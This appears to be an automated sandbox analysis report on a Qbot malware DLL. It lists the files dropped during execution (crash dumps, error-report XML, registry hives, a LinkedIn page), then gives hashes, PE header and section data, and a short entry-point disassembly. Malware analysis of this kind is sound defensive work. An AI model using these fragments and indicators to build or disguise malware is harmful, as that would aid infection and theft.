                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2074635" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Jun 7 08:04:47 2023, 0x1205a4 type
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43994
                                                                                                                                                                                                                                                                      Entropy (8bit):2.128746637822403
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Q7+kwnVl4O5Skb8k9XP1zyhCS1AiotX7vOhiQV4N:Z3VJ5Lb8kB9+k9iotX7uK
                                                                                                                                                                                                                                                                      MD5:357DBF89DFDE5EB16489508BF3AA9BB0
                                                                                                                                                                                                                                                                      SHA1:572B12BE82CFEBEFF6A81FF44672FCC69819BF51
                                                                                                                                                                                                                                                                      SHA-256:09F0A88AD57749C74EA08EEAA4E0CDB5334B4E1014EFAFEAFC04623248BE9043
                                                                                                                                                                                                                                                                      SHA-512:472A089B12EA2EA4804F267C6DDA5319B85F422E357F09CE81E7DEC6149BD6CA08C14240FD8F7E28AEB9F2663C355278941217E296A3D5B4BE336C1C9369D962
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:MDMP....... ........:.d.........................................,..........T.......8...........T..........................0................................................................................U...........B..............GenuineIntelW...........T............:.d.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Jun 7 08:04:47 2023, 0x1205a4 type
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):45078
                                                                                                                                                                                                                                                                      Entropy (8bit):2.0784012736743787
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:QZywncboO5SkbNqxYOXDc1GrMN1UPSDK7qL2lCE7/er:6cj5LbEXDc1GRSL2llw
                                                                                                                                                                                                                                                                      MD5:7AD9873640780E21556A936C1F7F4F0E
                                                                                                                                                                                                                                                                      SHA1:25BBB9B17C40BDDC6F44BA1EE882E99E7FBE5304
                                                                                                                                                                                                                                                                      SHA-256:DB092B4F13FD0DA3F55C29DB4E79D2A672CC8EEE23BF200BC998A23711776A63
                                                                                                                                                                                                                                                                      SHA-512:55AAE60C63A0FD98251D189417F57DF23FDC1EB0A256A3E7D2FAC927587B60DF24B76397B494136B12478D2EDA8B9578F693549F597F0F1AE430829E039C82D0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:MDMP....... ........:.d.........................................,..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T............:.d.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8240
                                                                                                                                                                                                                                                                      Entropy (8bit):3.690063539190381
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNi2r6P6YqF6QgmfTrS/H9Cprx89bXusfk8dm:RrlsNi66P6YQ6QgmfTrSbXtfkr
                                                                                                                                                                                                                                                                      MD5:A414C8BDA87601C971031FD02977031C
                                                                                                                                                                                                                                                                      SHA1:F178D2573A95F3B139E25B74E57335E360CE9F37
                                                                                                                                                                                                                                                                      SHA-256:5A3C8BACF551A1FAFB47A1A27C2BE5902C82F96F09DCD6948F612050303F9DDC
                                                                                                                                                                                                                                                                      SHA-512:DBBAC53C3989653B04BEC75287AB3337951A5589A0B83FD684F53DA0E81C6DF108088D5F81D1E354D1625FCC46075071CC9D2D62BEF81F3C7FE28A31CCCBD2D9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.8.<./.P.i.d.>.......
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8240
                                                                                                                                                                                                                                                                      Entropy (8bit):3.6906659355862796
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNi4u656Yq76QgmfTLS/H9CprOx89bX6sfHdm:RrlsNih656Ye6QgmfTLSUXZfg
                                                                                                                                                                                                                                                                      MD5:36060F0813FC354BE8C1FF7E1CEFD24E
                                                                                                                                                                                                                                                                      SHA1:E7D3F6693D1E7966249D6ADA35BD459D76509E1E
                                                                                                                                                                                                                                                                      SHA-256:1623A1F34587D9132E453B26AB7F6342D05808B129AF46137A40C4FA2C057E38
                                                                                                                                                                                                                                                                      SHA-512:E0F07FA512E49BDF638B183741210B16B4CCCC5FFB34E2A34D270EE9AB661B74265B2070B49ADCA716D8FF69D926FDE99D3A349072BD5F62958A85CAABEC8EE3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.9.6.<./.P.i.d.>.......
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4630
                                                                                                                                                                                                                                                                      Entropy (8bit):4.449642162249726
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwSD8zszJgtWI9AOWgc8sqYjH8fm8M4JCdspFm0k+q8/M24SrSUd:uITfNTvgrsqYQJ80kuDWUd
                                                                                                                                                                                                                                                                      MD5:99AE0358000C8108833438951A281DDA
                                                                                                                                                                                                                                                                      SHA1:6132397011E34102CDA1A89A035FA34793A3D950
                                                                                                                                                                                                                                                                      SHA-256:2A3F6189A05D0E48C2E56370A3AC0982C2E72DB35AC742F5079524EFA83188A6
                                                                                                                                                                                                                                                                      SHA-512:F80E61548480E34AFA63560E8C47F3AA7B009FB9E20AEC62329C92761F9F594BF3615AFDF845D48295925F29BA8DFE250D9AAFC5C9B47192655A2115195CB77A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2074635" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4630
                                                                                                                                                                                                                                                                      Entropy (8bit):4.452052282420109
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwSD8zszJgtWI9AOWgc8sqYjd8fm8M4JCdsdFS+q8/Mg4SrSEd:uITfNTvgrsqYuJw4DWEd
                                                                                                                                                                                                                                                                      MD5:995B428776C7CFEC012BA14EC4E1F11E
                                                                                                                                                                                                                                                                      SHA1:0F2F08CC971BD48F840507229CF216A702D04B34
                                                                                                                                                                                                                                                                      SHA-256:1403BD433F6EBCB164B8A6790DE64FB803600335BBF417BBDE1C62B07D8E45D5
                                                                                                                                                                                                                                                                      SHA-512:D552150CC82BA5EF573638086BC0672C0ECC9876DA7A8C92AE37E7BDA7534321ED93623E808926AB5E09BC6C0C47DC11DEF06A3789C0DEA7AD0A2155237D78D0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2074635" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (540)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):125262
                                                                                                                                                                                                                                                                      Entropy (8bit):4.778268296671285
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:1+SW4o9/vKI0pUuqGVCD8pAHQzHk9gIFFRKJ1jUdqoN8eB:1+SA8eB
                                                                                                                                                                                                                                                                      MD5:47D8225A9E27539BD32E7264CF77F444
                                                                                                                                                                                                                                                                      SHA1:A666682A7A432F0496A1E0ACF03F99F94C75647B
                                                                                                                                                                                                                                                                      SHA-256:2F36310CA434CBD37746E6806B6E9D85AFE1DA86F0972D07F7828E27C655379C
                                                                                                                                                                                                                                                                      SHA-512:9F171EBFFB02C138F07A358CB0514DDCE6E7F2BBAAB64BF96B36002DF730F036D1ACA965666170FF52E4F9427046736CFF37F9155E3CF9F6DFF64A5C3E1D2BAF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>... . . . . . . . . . .. . . . . .. . <html lang="en">. <head>. <meta name="pageKey" content="d_homepage-guest-home">. --> <meta name="locale" content="en_US">. <meta id="config" data-app-version="2.1.790" data-call-tree-id="AAX9fhafJH9ZRbVOz62nnA==" data-jet-tags="guest-homepage" data-multiproduct-name="homepage-guest-frontend" data-service-name="homepage-guest-frontend" data-browser-id="dc569e29-f7dd-417c-88a2-6d2dc9c10878" data-enable-page-view-heartbeat-tracking data-disable-comscore-tracking data-page-instance="urn:li:page:d_homepage-guest-home;7tUZ2aPzTBWUIjL+fsC33g==" data-disable-jsbeacon-pagekey-suffix="false" data-member-id="0">.. <link rel="canonical" href="https://www.linkedin.com/">. <link rel="alternate" hreflang="de" href="https://de.linkedin.com/">. <link rel="alternate" hreflang="en-IE" href="https://ie.linkedin.com/">. <link rel="alternate"
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1572864
                                                                                                                                                                                                                                                                      Entropy (8bit):4.294316661842153
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:12288:i88NLgyojp1EHLm0HHPGxpdCeJLfL8daJnJz4aXpxzcca+THnH66CKj:QNLgyojp1EHLm0Efd
                                                                                                                                                                                                                                                                      MD5:09638B666048B187A6E70D76F25001F7
                                                                                                                                                                                                                                                                      SHA1:5892C325915E1A7A98509ED76E4CF96093AE2456
                                                                                                                                                                                                                                                                      SHA-256:AD8EAA0CAD4EF00D972F8CCB179A35D3C57811BED76E76135CDCFD991F05511B
                                                                                                                                                                                                                                                                      SHA-512:176864989CB150302BBC4C83DE8E56641995F4579119606B722F02E90AAE2816328BF86FD29607A170F2E0664811B1E73617807A5A0905F6FD802864C648CE5C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:regfj...j...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                      Entropy (8bit):3.8213102723382906
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:aQURftx1fJ4JUHQAJfzqiVx0kqQvSC9O2MY+qE:ezRhK
                                                                                                                                                                                                                                                                      MD5:873FFB75DBA206A5BC148FE4F7CA634E
                                                                                                                                                                                                                                                                      SHA1:0F12E02156348CD15AEABC3A55513101ED06A1C8
                                                                                                                                                                                                                                                                      SHA-256:58B940B239865952BD24C8C7E77DDD516F7E3C8B9FB75EE87D47A2B053973EB7
                                                                                                                                                                                                                                                                      SHA-512:FEB0D736360FABAC712386EAC925522FBEFCC58D0863F78F67551A001FF3F86549342B3759212F863C05D624DCA6877DB425F7F262AC020234B5E7AB79363536
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:regfi...i...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm........................................................................................................................................................................................................................................................................................................................................................HvLE.n......i...........4...B.....[...@..........0...................0..hbin................p.\..,..........nk,............h........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ............ ........................... .......Z.......................Root........lf......Root....nk .........................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                                                                                                                                                                                                                                                                      File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                      Entropy (8bit):6.610461945368989
                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                      File name:042_qbot.dll.dll
                                                                                                                                                                                                                                                                      File size:741925
                                                                                                                                                                                                                                                                      MD5:8c18224b2fcb618bb4305a8687b3bb22
                                                                                                                                                                                                                                                                      SHA1:c0a9a8cb468d0f9b185fa1112683612c01c60673
                                                                                                                                                                                                                                                                      SHA256:d93d05a84c4d9579accd5dc839ee9f8f7e7f54c623e37175a59146664530dc3d
                                                                                                                                                                                                                                                                      SHA512:5b97a909cd2bca451bbc75cfb9e16ed7a16ec34a25fa1c41d9fa120819e54d349bace2116e31c91fddc5b683153dba2829830c39e0a3d9677f8efcadee5e04db
                                                                                                                                                                                                                                                                      SSDEEP:12288:zDxy+2MIBYYimb3oG11xfTUUk0uU7/GQ4vbnWj68N:Pg+2MIBYkb4G11hTQ05bGM
                                                                                                                                                                                                                                                                      TLSH:A4F43B83A6826C92DBE61435CD9ED33667347A5C83F3DBB3F514A9E27D631A33944208
                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.WW.2..C......!.....L..........p........`.....j............>............ .......4........ ......................0..S..
                                                                                                                                                                                                                                                                      Icon Hash:7ae282899bbab082
                                                                                                                                                                                                                                                                      Entrypoint:0x6ad81470
                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                                      Imagebase:0x6ad80000
                                                                                                                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                                                                                                                                                                                                                      DLL Characteristics:
                                                                                                                                                                                                                                                                      Time Stamp:0x5757085E [Tue Jun 7 17:46:06 2016 UTC]
                                                                                                                                                                                                                                                                      TLS Callbacks:0x6adc4bf0, 0x6adc4ba0
                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                      Import Hash:1cba0e23b706e0bfbc0a4cb9b6bd80fb
                                                                                                                                                                                                                                                                      Signature Valid:
                                                                                                                                                                                                                                                                      Signature Issuer:
                                                                                                                                                                                                                                                                      Signature Validation Error:
                                                                                                                                                                                                                                                                      Error Number:
                                                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                                          Version:
                                                                                                                                                                                                                                                                          Thumbprint MD5:
                                                                                                                                                                                                                                                                          Thumbprint SHA-1:
                                                                                                                                                                                                                                                                          Thumbprint SHA-256:
                                                                                                                                                                                                                                                                          Serial:
                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                          sub esp, 1Ch
                                                                                                                                                                                                                                                                          mov edx, dword ptr [esp+24h]
                                                                                                                                                                                                                                                                          mov dword ptr [6ADF2030h], 00000000h
                                                                                                                                                                                                                                                                          cmp edx, 01h
                                                                                                                                                                                                                                                                          je 00007F2A9879D03Ch
                                                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+28h]
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+20h]
                                                                                                                                                                                                                                                                          call 00007F2A9879CE32h
                                                                                                                                                                                                                                                                          add esp, 1Ch
                                                                                                                                                                                                                                                                          retn 000Ch
                                                                                                                                                                                                                                                                          lea esi, dword ptr [esi+00000000h]
                                                                                                                                                                                                                                                                          mov dword ptr [esp+0Ch], edx
                                                                                                                                                                                                                                                                          call 00007F2A987E0E1Ch
                                                                                                                                                                                                                                                                          mov edx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                          jmp 00007F2A9879CFF9h
                                                                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                          sub esp, 10h
                                                                                                                                                                                                                                                                          mov ebx, dword ptr [6ADF4124h]
                                                                                                                                                                                                                                                                          mov dword ptr [esp], 6ADC7000h
                                                                                                                                                                                                                                                                          call ebx
                                                                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                                                                          sub esp, 04h
                                                                                                                                                                                                                                                                          test esi, esi
                                                                                                                                                                                                                                                                          mov eax, 00000000h
                                                                                                                                                                                                                                                                          je 00007F2A9879D04Bh
                                                                                                                                                                                                                                                                          mov dword ptr [esp], 6ADC7000h
                                                                                                                                                                                                                                                                          call dword ptr [6ADF4144h]
                                                                                                                                                                                                                                                                          sub esp, 04h
                                                                                                                                                                                                                                                                          mov dword ptr [6ADF201Ch], eax
                                                                                                                                                                                                                                                                          mov dword ptr [esp+04h], 6ADC7013h
                                                                                                                                                                                                                                                                          mov dword ptr [esp], esi
                                                                                                                                                                                                                                                                          call dword ptr [6ADF4128h]
                                                                                                                                                                                                                                                                          sub esp, 08h
                                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                                          je 00007F2A9879D033h
                                                                                                                                                                                                                                                                          mov dword ptr [esp+04h], 6ADF2004h
                                                                                                                                                                                                                                                                          mov dword ptr [esp], 6ADEC000h
                                                                                                                                                                                                                                                                          call eax
                                                                                                                                                                                                                                                                          mov eax, dword ptr [6ADC6020h]
                                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                                          je 00007F2A9879D05Ah
                                                                                                                                                                                                                                                                          mov dword ptr [esp], 6ADC7029h
                                                                                                                                                                                                                                                                          call ebx
                                                                                                                                                                                                                                                                          mov edx, 00000000h
                                                                                                                                                                                                                                                                          sub esp, 04h
                                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                                          je 00007F2A9879D038h
                                                                                                                                                                                                                                                                          mov dword ptr [esp+04h], 00DC7037h
                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x730000xc53.edata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x740000x5a4.idata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x8df100x1cc8/55
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x770000x1790.reloc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x760000x18.tls
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x741080xcc.idata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                          .text0x10000x44ad40x44c00False0.4085191761363636data6.536085286601772IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .data0x460000x240x200False0.068359375data0.444378072732298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
